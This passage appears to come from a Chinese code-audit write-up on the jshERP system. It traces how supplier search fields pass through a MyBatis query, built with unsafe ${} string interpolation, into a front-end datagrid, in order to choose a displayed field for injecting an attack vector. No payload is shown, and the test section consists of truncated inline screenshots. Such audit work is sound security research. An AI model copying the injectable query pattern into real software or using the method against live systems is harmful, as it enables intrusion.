<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 这里</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=c1>// 会将查询到的参数放在map的page参数中</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>和上述分析过程一致,得到一下查询语句</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"selectByConditionSupplier"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.SupplierExample"</span> <span class=na>resultMap=</span><span class=s>"com.jsh.erp.datasource.mappers.SupplierMapper.BaseResultMap"</span><span class=nt>&gt;</span>
select *
FROM jsh_supplier
where 1=1
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"supplier != null"</span><span class=nt>&gt;</span>
and supplier like '%${supplier}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"type != null"</span><span class=nt>&gt;</span>
and type='${type}'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"phonenum != null"</span><span class=nt>&gt;</span>
and phone_num like '%${phonenum}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"telephone != null"</span><span class=nt>&gt;</span>
and telephone like '%${telephone}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"description != null"</span><span class=nt>&gt;</span>
and description like '%${description}%'
<span class=nt>&lt;/if&gt;</span>
and ifnull(delete_flag,'0') !='1'
order by id desc
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"offset != null and rows != null"</span><span class=nt>&gt;</span>
limit #{offset},#{rows}
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>这将数据库中的全部字段结果返回最后封装在json的page参数中</p>
<p>现在需要寻找将这些结果渲染到前端页面的html文件使用ajax必定会对响应的路由发起请求搜索/supplier/list</p>
<p>在supplier.js文件中</p>
<div class=highlight><pre><span></span><span class=kd>function</span> <span class=nx>showSupplierDetails</span><span class=p>(</span><span class=nx>pageNo</span><span class=p>,</span><span class=nx>pageSize</span><span class=p>)</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>supplier</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchSupplier"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>phonenum</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchPhonenum"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>telephone</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchTelephone"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=kd>var</span> <span class=nx>description</span> <span class=o>=</span> <span class=nx>$</span><span class=p>.</span><span class=nx>trim</span><span class=p>(</span><span class=nx>$</span><span class=p>(</span><span class=s2>"#searchDesc"</span><span class=p>).</span><span class=nx>val</span><span class=p>());</span>
<span class=nx>$</span><span class=p>.</span><span class=nx>ajax</span><span class=p>({</span>
<span class=nx>type</span><span class=o>:</span><span class=s2>"get"</span><span class=p>,</span>
<span class=nx>url</span><span class=o>:</span> <span class=s2>"/supplier/list"</span><span class=p>,</span>
<span class=nx>dataType</span><span class=o>:</span> <span class=s2>"json"</span><span class=p>,</span>
<span class=nx>data</span><span class=o>:</span> <span class=p>({</span>
<span class=nx>search</span><span class=o>:</span> <span class=nx>JSON</span><span class=p>.</span><span class=nx>stringify</span><span class=p>({</span>
<span class=nx>supplier</span><span class=o>:</span> <span class=nx>supplier</span><span class=p>,</span>
<span class=nx>type</span><span class=o>:</span> <span class=nx>listType</span><span class=p>,</span>
<span class=nx>phonenum</span><span class=o>:</span> <span class=nx>phonenum</span><span class=p>,</span>
<span class=nx>telephone</span><span class=o>:</span> <span class=nx>telephone</span><span class=p>,</span>
<span class=nx>description</span><span class=o>:</span> <span class=nx>description</span>
<span class=p>}),</span>
<span class=nx>currentPage</span><span class=o>:</span> <span class=nx>pageNo</span><span class=p>,</span>
<span class=nx>pageSize</span><span class=o>:</span> <span class=nx>pageSize</span>
<span class=p>}),</span>
<span class=nx>success</span><span class=o>:</span> <span class=kd>function</span> <span class=p>(</span><span class=nx>res</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span><span class=p>(</span><span class=nx>res</span> <span class=o>&amp;&amp;</span> <span class=nx>res</span><span class=p>.</span><span class=nx>code</span> <span class=o>===</span> <span class=mi>200</span><span class=p>){</span>
<span class=k>if</span><span class=p>(</span><span class=nx>res</span><span class=p>.</span><span class=nx>data</span> <span class=o>&amp;&amp;</span> <span class=nx>res</span><span class=p>.</span><span class=nx>data</span><span class=p>.</span><span class=nx>page</span><span class=p>)</span> <span class=p>{</span>
<span class=nx>$</span><span class=p>(</span><span class=s2>"#tableData"</span><span class=p>).</span><span class=nx>datagrid</span><span class=p>(</span><span class=s1>'loadData'</span><span class=p>,</span> <span class=nx>res</span><span class=p>.</span><span class=nx>data</span><span class=p>.</span><span class=nx>page</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>},</span>
<span class=c1>//此处添加错误处理</span>
<span class=nx>error</span><span class=o>:</span><span class=kd>function</span><span class=p>()</span> <span class=p>{</span>
<span class=nx>$</span><span class=p>.</span><span class=nx>messager</span><span class=p>.</span><span class=nx>alert</span><span class=p>(</span><span class=s1>'查询提示'</span><span class=p>,</span><span class=s1>'查询数据后台异常,请稍后再试!'</span><span class=p>,</span><span class=s1>'error'</span><span class=p>);</span>
<span class=k>return</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>});</span>
<span class=p>}</span>
</pre></div>
<p>这里对相应的url发起请求并将其渲染至id为tableData的标签中</p>
<p>寻找调用showSupplierDetails方法的地方与之匹配的是同文件的initTableData方法在该方法中只显示了如下参数</p>
<div class=highlight><pre><span></span><span class=nx>columns</span><span class=o>:</span><span class=p>[[</span>
<span class=p>{</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'id'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>35</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>checkbox</span><span class=o>:</span><span class=kc>true</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'操作'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'op'</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>60</span><span class=p>,</span>
<span class=nx>formatter</span><span class=o>:</span><span class=kd>function</span><span class=p>(</span><span class=nx>value</span><span class=p>,</span><span class=nx>rec</span><span class=p>,</span><span class=nx>index</span><span class=p>)</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>str</span> <span class=o>=</span> <span class=s1>''</span><span class=p>;</span>
<span class=nx>str</span> <span class=o>+=</span> <span class=s1>'&lt;img title="编辑" src="/js/easyui/themes/icons/pencil.png" style="cursor: pointer;" onclick="editSupplier(\''</span> <span class=o>+</span> <span class=nx>index</span> <span class=o>+</span> <span class=s1>'\');"/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;'</span><span class=p>;</span>
<span class=k>if</span><span class=p>(</span><span class=nx>isShowOpFun</span><span class=p>())</span> <span class=p>{</span>
<span class=nx>str</span> <span class=o>+=</span> <span class=s1>'&lt;img title="删除" src="/js/easyui/themes/icons/edit_remove.png" style="cursor: pointer;" onclick="deleteSupplier(\''</span> <span class=o>+</span> <span class=nx>rec</span><span class=p>.</span><span class=nx>id</span> <span class=o>+</span> <span class=s1>'\');"/&gt;'</span><span class=p>;</span>
<span class=p>}</span>
<span class=k>return</span> <span class=nx>str</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'名称'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'supplier'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>150</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'联系人'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'contacts'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>50</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'手机号码'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'telephone'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'电子邮箱'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'email'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>80</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'联系电话'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'phoneNum'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'传真'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'fax'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>100</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'预付款'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'advanceIn'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期初应收'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'beginNeedGet'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期初应付'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'beginNeedPay'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期末应收'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'allNeedGet'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'期末应付'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'allNeedPay'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'税率(%)'</span><span class=p>,</span> <span class=nx>field</span><span class=o>:</span> <span class=s1>'taxRate'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>60</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>},</span>
<span class=p>{</span> <span class=nx>title</span><span class=o>:</span> <span class=s1>'状态'</span><span class=p>,</span><span class=nx>field</span><span class=o>:</span> <span class=s1>'enabled'</span><span class=p>,</span><span class=nx>width</span><span class=o>:</span><span class=mi>70</span><span class=p>,</span><span class=nx>align</span><span class=o>:</span><span class=s2>"center"</span><span class=p>,</span><span class=nx>formatter</span><span class=o>:</span><span class=kd>function</span><span class=p>(</span><span class=nx>value</span><span class=p>){</span>
<span class=k>return</span> <span class=nx>value</span><span class=o>?</span> <span class=s2>"&lt;span style='color:green'&gt;启用&lt;/span&gt;"</span><span class=o>:</span><span class=s2>"&lt;span style='color:red'&gt;禁用&lt;/span&gt;"</span><span class=p>;</span>
<span class=p>}}</span>
<span class=p>]]</span>
</pre></div>
<p>因此在插入攻击向量时需要在显示的参数中进行选择当然还需要考虑前端的js过滤。</p>
<p>调用initTableData方法的地方在supplier.js中</p>
<div class=highlight><pre><span></span><span class=c1>//初始化界面</span>
<span class=nx>$</span><span class=p>(</span><span class=kd>function</span><span class=p>()</span> <span class=p>{</span>
<span class=kd>var</span> <span class=nx>listTitle</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//单据标题</span>
<span class=kd>var</span> <span class=nx>listType</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//类型</span>
<span class=kd>var</span> <span class=nx>listTypeEn</span> <span class=o>=</span> <span class=s2>""</span><span class=p>;</span> <span class=c1>//英文类型</span>
<span class=nx>getType</span><span class=p>();</span>
<span class=nx>initTableData</span><span class=p>();</span>
<span class=nx>ininPager</span><span class=p>();</span>
<span class=nx>bindEvent</span><span class=p>();</span>
<span class=p>});</span>
</pre></div>
<p>这个在引入js时即会调用全局搜索引入supplier.js的地方</p>
<p><a id=img18 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233356-500a2e40-c117-1.png><img src=data:image/png;base64,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
<p>在customer.html文件中找到了id为tableData的table</p>
<div class=highlight><pre><span></span><span class=p>&lt;</span><span class=nt>table</span> <span class=na>id</span><span class=o>=</span><span class=s>"tableData"</span> <span class=na>style</span><span class=o>=</span><span class=s>"top:300px;border-bottom-color:#FFFFFF"</span><span class=p>&gt;&lt;/</span><span class=nt>table</span><span class=p>&gt;</span>
</pre></div>
<p>整个流程到这里结束</p>
<h4>测试</h4>
<p>触发界面</p>
<p><a id=img19 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233410-582e6ac8-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB2wAAALqCAYAAAD5K6SiAAEAAElEQVR4nOzdd3xV9f3H8de59+ZmhzAyICwZsoegCIIyRIaiVqWIq6Ji+7POiqsOqLRqXbVYR1VEqFVxV0UBNwIylL03YYYsyB53nN8f997kJrlJbkJCAryfjwdt7ln3e+89GZ73+Xy+RuI/TRMRERERERERERERERERETnhLA09ABERERERERERERERERGR05UCWxERERERERERERERERGRBqLAVkRERERERERERERERESkgSiwFRERERERERERERERERFpIApsRUREREREREREREREREQaiAJbEREREREREREREREREZEGosBWRERERERERERERERERKSBKLAVEREREREREREREREREWkgCmxFRERERERERERERERERBqIAlsRERERERERERERERERkQZia+gBiIiIiIiIiIiIiIiIiJzMTKOYrOg3KAxbAbiq2dpKWOG5NMm5FcO0n4jhSSOnClsRERERERERERERERGR4+AJa3+m+rAWwEVh2M9kRb9R38OSk4QCWxEREREREREREREREZHj4Kmsrf995NSkwFZERERERERERERERETkuARTWVsX+8ipSIGtiIiIiIiIiIiIiIiISD248fyXMa95mU/OaOiRSGNma+gBiIiIiIiIiIiIiIiIiJxKbjz/ZWa3jvU+OtaAI6md7s3dXNDayYAkC93jbTQPc2AWF2DaQjlaHMrWDJPl+xz8dMDG5gzVhx4vBbYiIiIiIiIiIiIiIiIidW4Pnx5oyhWtG3ocwbu0k4sbujs4K85BZFQ0Rw4f5Is577Dq1+XkZGURFhFOtx59uWz8NYwe1oPc3FzWpNl4e1MIX+yyNvTwT1pG4j9Ns6EHISIiIiIiIiIiIiIiInKySom/LuByT6UtfLr8dq7cU3F9Yuo79Tyy4HRv7ubPAx2c18qF2+0iMjKaFT//yOMP3cWhA/sIDQ3DYrVgut0UFRURFR3Dn/78V66c+DvycnOxWCz8fNDKUytCVHFbC427wjYaPr0OIvfCE0thUY53eQI82BWivA+XLoIFDTREERERERERERERERERkZPV+C4unhlahGmC2+0mLCycbZs38NCdN+NwFJOQ2BKn0wmmCRjENGmCw+HgiUfvJTomhlEX/4bcnBzOS4IvrnTx4E+hfLRN1bY10agD23tGw8BQoAvM7Qz/fg8eTweawbV9Id67naN8YBsND42CDtvg9xtLF0+9Bm6Lp16sXw2jF9fPsUVERERERERERERERETq2s29nDw6yIFpGoCJARgYvPLCk+Tl5mALjSQ9M4uQEBtWi6fCttjpwrBYCA0L5d8vPMk5gy4gPDwCl8uFYRg8M7SYGHsIszY06hiyUWm079TA8+HOpNLHqXvhjfTq9xt6DvztbOhkBxJg6lGYfrC+RikiIiIiIiIiIiIiIiJy8hnfxcWjgxyeB4aJ6XITFh7Bzu2bWbtqOSGhEQwf0ImmTSLYsP0gOXnFhNqtdOuYiN1u5Zuft7Nn925+WbaIURdfQW5ODobVionJo4McZBcbqrQNUqMMbFv1hFfPggjvY1cuPPMjHKpqn7bwt2EwqimUfPQhMHk4fPdfWAqs3AYhVR3EAhf3hla+x/nwznYoCGLMB/1C4dpU8pap0O0G60aVVhBXyg3ZhbD9MLy1FD45Wm59MMdxQ7YDkveWazstIiIiIiIiIiJSnabwh86wdwcsLH9tqjE5Hw73g1dnwPSGHouIiEgj0L25m2eGFnsemGAALtPEarWwb89OUtMy+cO1I/jTpBGYThcFhcUUFDmxh9iICAvBGm6nd+fW3PfUe+zatgVz7G8wTRMAwzTAgGeGFrM5PVRz2gah8QW2SfDWBZBoeB+7YNYCeKeKIHHwBLg5EUKNsssP7oUp33vCWoAFq72tk8vNgVuiCST4PUzPqj6sPbgf/r27mo3qiwViIuDsjnB2W+j5WS2qiS0QEwq9usA7beGfX8JzqkgWERERERERaTQ6tUqmPXF8eyii+o2r0jSNkbH5ZZe5mrB5n52BQx7g2ohJ3PV1R+65oRk3NIP1q01Gr/2R18d+xL71z/C3rZ7n79T1dV4YMoc9Pyzlrl3HN6S6UczUq+OYGD6INXuf5V/bY4gKrX6v7GPtWOkNGEeMOpdZHVM5fPhZ7vvfeM+1pKRPeblrG5747mwOsY5Zt/ZlbASk7lpLn3l9IGEez3TpzD9/6lJlkcGEcR2Z0XE30IH5X+/i5i3H/4obg97d4Z4+MCLOe01uIKSkwcfrYNbmqgsvamrWrZC09fimI5uQDuuB266B6e8Fsf04mNES7n4DPghifGP9vj3nf02Zz3nCOJjRsfKweNat0P8w9JkXxAsRT7EM0LKKz3HhrfBmZZ+dt8jl4zoM7xfeDb39HpcpzgniZoGanG+NUjQMbQEhwW7vgs37avhzoqY3XdTmc/Y+h7/jnQpx6jVwW9RJ/NkGqymMjC23rAi+Lfchd2oF7cv9js4+Rsnv45OfFXBVWDpn8e3MqXKfhvHwQEfJ16ZhgtvAMMA0TbKzs0mKj+amyweSn1tAscOFzWohPNSG2w25eYWQV8jFQ3vywVftyMjwfIiG4QnqTEwMjJLnuf7LIP44O06BiilTd9Xz79fz4XDXst/jtf293qgC21Zt4a1x0Nv/J3sRbKwmQOzdsuxjRz78ZzE8urWSHcrNgVuZFi1hcsuqt1nvbsDA1l8I/H4EfP02LK/lIazhcM9w+Pa/sLYuxyYiIiIiIiIiNZTKH8dM4tZOX5No9V74cyeybc8spi0aW7sOWT1v4u1+X5Zdlv8AD2/czaP9PyKCT/hH2ufkh/lWFnPdsFu4tOVuiN+L5eg8pkc/yTujHqGtAWcNe5AVqb343c03lAkqAruEV2fMK3PRvDTIrIkAoWf0l5wdl01T6